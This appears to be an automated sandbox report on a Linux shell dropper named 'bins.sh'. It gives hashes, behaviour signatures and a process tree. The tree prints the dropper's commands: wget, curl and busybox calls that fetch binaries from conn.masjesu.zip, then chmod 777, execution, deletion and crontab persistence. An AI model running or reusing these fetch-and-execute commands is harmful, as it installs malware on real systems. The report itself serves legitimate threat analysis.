Analysis
-
max time kernel
150s -
max time network
153s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
04-11-2024 10:45
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
facd8d5b4de07f8d4d3e00bf507864de
-
SHA1
6b61bfefc5c5b94bbb154d7bfa00d46c67c421a5
-
SHA256
00f8a20ed14d818a6397e452410bbc7ad21628aa1aad3b52031fab9dfcd648ad
-
SHA512
9c32e3e7c4e80b00a5a7cf8ab8d5d4539c19359d0bc62d259b149551d6ef3051a352dde1a701dca898959b6f6d5c1434583f2f992a01caf02fece8a36d5bd721
-
SSDEEP
192:yjojaqBgs6UM43mu0Ay85dgTjF7S7i7DU7wvKhdKHH+5dgTj57S7i7DU7wmhdKHw:yjojaqBgsuAy85dgTjFGuUqC5dgTj5GL
Malware Config
Signatures
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Contacts a large (1893) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 5 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodpid Process 717 chmod 725 chmod 750 chmod 867 chmod 886 chmod -
Executes dropped EXE 4 IoCs
Processes:
cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1dds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kMn2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyjioc pid Process /tmp/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj 718 cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj /tmp/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d 726 46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d /tmp/ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM 752 ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM /tmp/n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj 887 n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj -
Renames itself 1 IoCs
Processes:
ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kMpid Process 753 ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc Process File opened for modification /var/spool/cron/crontabs/tmp.vBHty3 crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Processes:
ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kMcrontabcurldescription ioc Process File opened for reading /proc/11/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/933/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/1025/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/1030/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/1024/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/1041/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/filesystems crontab File opened for reading /proc/687/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/897/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/976/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/985/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/994/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/13/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/22/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/75/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/661/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/825/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/766/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/789/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/836/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/818/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/1016/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/942/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/1039/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/23/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/78/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/662/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/800/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/866/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/847/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/928/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/986/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/922/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/930/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/684/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/778/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/883/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/908/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/21/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/819/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/842/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/943/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/1013/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/77/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/777/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/801/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/874/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/918/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/802/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/923/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/979/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/1045/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/846/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/887/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/947/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/962/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/798/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/840/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/967/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/1043/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/643/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/813/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM File opened for reading /proc/843/cmdline ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM -
System Network Configuration Discovery 1 TTPs 19 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
wgetcurlcQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkjbusyboxwgetbusyboxwgetcurlbusyboxcurlwgetcurlcurlrmwgetcurlbusyboxwgetbusyboxpid Process 875 wget 899 curl 718 cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj 854 busybox 729 wget 745 busybox 770 wget 722 curl 724 busybox 879 curl 894 wget 709 curl 772 curl 720 rm 721 wget 730 curl 882 busybox 693 wget 716 busybox -
Writes file to tmp directory 10 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlbusyboxcurlbusyboxwgetcurlbusyboxwgetbusyboxdescription ioc Process File opened for modification /tmp/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj wget File opened for modification /tmp/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj curl File opened for modification /tmp/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj busybox File opened for modification /tmp/ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM curl File opened for modification /tmp/n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj busybox File opened for modification /tmp/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d wget File opened for modification /tmp/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d curl File opened for modification /tmp/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d busybox File opened for modification /tmp/ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM wget File opened for modification /tmp/ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:685
-
/bin/rm/bin/rm bins.sh2⤵PID:689
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:693
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:709
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:716
-
-
/bin/chmodchmod 777 cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj2⤵
- File and Directory Permissions Modification
PID:717
-
-
/tmp/cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj./cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:718
-
-
/bin/rmrm cQUA61T9gfbT8tBKu2HQa1MWKCipo4LTkj2⤵
- System Network Configuration Discovery
PID:720
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:721
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:722
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:724
-
-
/bin/chmodchmod 777 46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d2⤵
- File and Directory Permissions Modification
PID:725
-
-
/tmp/46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d./46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d2⤵
- Executes dropped EXE
PID:726
-
-
/bin/rmrm 46bvg0YqtYDdufVSGJCucVbCB0kmg9xG1d2⤵PID:728
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:729
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:730
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:745
-
-
/bin/chmodchmod 777 ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM2⤵
- File and Directory Permissions Modification
PID:750
-
-
/tmp/ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM./ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:752 -
/bin/shsh -c "crontab -l"3⤵PID:754
-
/usr/bin/crontabcrontab -l4⤵PID:755
-
-
-
/bin/shsh -c "crontab -"3⤵PID:758
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:759
-
-
-
-
/bin/rmrm ds99h0bmb4Ph1f51gHhpbvsQyXi0dZ32kM2⤵PID:766
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/YCvnksFSH1vdIuLShhTyg2gEBF7r97p5qk2⤵
- System Network Configuration Discovery
PID:770
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/YCvnksFSH1vdIuLShhTyg2gEBF7r97p5qk2⤵
- System Network Configuration Discovery
PID:772
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/YCvnksFSH1vdIuLShhTyg2gEBF7r97p5qk2⤵
- System Network Configuration Discovery
PID:854
-
-
/bin/chmodchmod 777 YCvnksFSH1vdIuLShhTyg2gEBF7r97p5qk2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/YCvnksFSH1vdIuLShhTyg2gEBF7r97p5qk./YCvnksFSH1vdIuLShhTyg2gEBF7r97p5qk2⤵PID:868
-
-
/bin/rmrm YCvnksFSH1vdIuLShhTyg2gEBF7r97p5qk2⤵PID:871
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj2⤵
- System Network Configuration Discovery
PID:875
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj2⤵
- System Network Configuration Discovery
PID:879
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:882
-
-
/bin/chmodchmod 777 n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj./n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm n2hryWU1tVRQjFi33Gg0W0Eu59XnodaJyj2⤵PID:889
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QcdrIEZDXYUM9RbUiOWvmWrbMxHb7Wcj6i2⤵
- System Network Configuration Discovery
PID:894
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QcdrIEZDXYUM9RbUiOWvmWrbMxHb7Wcj6i2⤵
- System Network Configuration Discovery
PID:899
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
127KB
MD589077b7bd4bcafca7713be43635c4862
SHA1fc02edb8fba29ea8ee99e6157ef8560334530052
SHA25678416feab0c93152d65acc8f48835520db083cc3aed0aea622b9fb88284dc00d
SHA5121b457b8f8d452eecaad9013241e50672befb70feb5349f5fa72d62ea1fa8affa968763e6511cc76cdc5bf12f080e4a8f10c8e141ccd0d36794e721d690f2c4b1
-
Filesize
98KB
MD55141342d0df8699fa32a6b066a0c592e
SHA18157673225bd5182f16215e2aa823a25ca2d4fbc
SHA25654302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d
SHA512d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801
-
Filesize
151KB
MD56c583043d91c55aa470c08c87058e917
SHA1abf65a5b9bba69980278ad09356e53de8bb89439
SHA2562d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948
SHA51282ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5
-
Filesize
111KB
MD5ca897a38f23ec23521ce0b1b83f8422d
SHA1b8d2ab335346aba9a72bae0fe3533aca1ab7b66a
SHA256043df61baf17d6a2353b418c5f87eebea4ca1c3fd6b63eaccc34d9bcd0556832
SHA51210d3026b43167121b62786dde231a04e25eb27905989f59a92b5eba92134e30cea554a73e419d3a505e650ee4c474ee407103df335cd84bd8c0f3428ccc16feb
-
Filesize
210B
MD5869e0da355a4faabd8aa2d661459b7e1
SHA15d817d53c410b8f45d4cce5cdf7b228df7ff97a1
SHA25660a6877783cee1b04d48bc18da841c991b136e2b21b22ca78e768f1fc2abe818
SHA51231f64160224867c7ab6449ad31d78296c300561a545bb5d26d048d047b594e1eee8e52c70744db2fc6d07d0479346e5cd3198c732bf8b1732a5320895a1e6af6